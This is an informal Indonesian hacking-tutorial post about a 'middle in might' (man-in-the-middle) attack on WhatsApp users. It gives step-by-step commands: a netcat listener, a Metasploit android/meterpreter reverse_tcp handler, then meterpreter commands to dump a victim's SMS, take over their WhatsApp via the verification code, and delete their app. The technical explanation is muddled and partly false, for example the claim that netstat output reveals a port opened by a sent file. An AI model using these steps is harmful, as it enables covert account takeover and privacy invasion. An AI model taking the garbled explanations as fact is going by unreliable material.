Tutor Midle In Might

11/07/2019
       *Assalamualaikum Wr.Wb*

materi hari ini : *midle in might*

apa Itu MIM?mim/midle in might adlh
suatu aktivitas yang dimana user hckr
membaca,menela'a dan mengedit 
suatu percakapan antara 2 korban :)
biasanya itu terjadi antara *end to end*
pada percakapan whatsapp :P

Bisanya User MIM ini Menggunakan
Metode SS7 dalam program protocol

apa itu ss7?> ss7 adalah suatu program
yang dimana kita menghantam/masuk
kedalam sebuah percakapan berbasis
protocol :P,istilahnya seperti :
*SPYWARE* 

mungkin ad yg tw donk berita hri ini
tentang hekel israel :v

tau aja ya :v
~√~√~√~√~√√~√~√~√~√~√~√~√~√~
bagaimana proses jalannya suatu prgrm
tersebut???

gni nih,putra jlsin :) 

./ilustrasi>

korban1+korban2 sedang chat ya di wa
ketika ia mengirim suatu file/lampiran
disitulah port protocol terbuka>
dan disitulah hekel masuk kedalam
system pembicaraan melalui jalur akses
protocol :v,ngeri bukan :v
~~~~~~~~~~~~~~~~~~~~~~~~~
anda mau tau bagaimana hekel tsb msk
secara tiba tiba??


anda pnya termos/termux/terminal :v

caranya mudah,cukup anda kirim file
ke korban,file apa aja,klo bisa bokep :v

lalu anda ketik di terminal

$netstat -n

    {itu setelah kirim file nya ya sobat"}

maka terminal akan melacak file tsb

seperti ini:
Proto Send-Q Local Address frg Address         
Active UNIX domain sockets (w/o servr)
unix  2      [ ]         DGRA  2165 @suilst


unix  3      [ ] STREAM CONNECTED 2613 /dev/socket/qmux_radio/qmux_client_socket    572


unix  3      [ ]         STREAM     CONNECTED     2475847 /dev/socket/qmux_radio/qmux_client_socket    521

~~~~~~~~~~~~~~~~~~~~~~~~~
 *CONTOH FILE YG AKU KIRIM TADI*
*NAMANYA SUILST* MAKA PORTNYA
ADLAAH 2613, bagaimana hacker bsa
msuk ???ke port itu???

anda bsa pergi ke sini:
http://www.canyouseeme.org/

dan di situ adalah pengecekan port

masukan port yang tadi di situ jika
forward gagal atau tulisan merah

anda pergi ke termux

dan ketik

$nc -vlp {port yang tadi} tnpa($)

setelah itu check lagi di web itu,
maka akan berhasil :)
~~~~~~~~~~~~~~~~~~~~~~~~~
setelah itu anda tinggal buka metaploit

$msfconsole

nsf>use multi/handler

nsf>set payload android/meterpreter/reverse_tcp

nsf>set lhost=ip yang di web tdi

nsf>set lport=port yang tdi

nsf>exploit
~~~~~~~~~~~~~~~~~~~~~~~~~

lalu kirim ulang file nya ke target :v
setelah ia buka,tanpa download maka
meterpreterpun akan siap :v

setelah sudah masuk ke meterpreter
contoh

meterpreter>

ketik>ifconfig
lalu salin ip dia dan port terbukanya
~~~~~~~~~~~~~~~~~~~~~~~~~
     *di fase meterpreter anda bisa*
  *mainin apa aja di hp korban secara*
                          *jauh :v*

     *kalo anda mw mainin wa dia*

ketik di meterpreter>

meterpreter>open com.whatsapp
buka whatsapp kloningan km
lalu pasang no target nya di wa km
lalu ada menunggu verty,buka terminal
ketik>

meterpreter>dump_sms
setelah dump berhasil,ketik lagi

meterpreter>delete com.whatsapp
agar wa korban kehapus :v

setelah dumping
cari tau letak hasil dumpingan kita tadi
mamank.:v

buka terminal baru

$cd metasploit-framework
$ls
(disitu ada format txt ga?)
(contoh.sms_dump_20190513175838.txt)

lalu ketik
$nano (file yang tadi.txt)

done lalu liat code nya.deh :v

0 Comments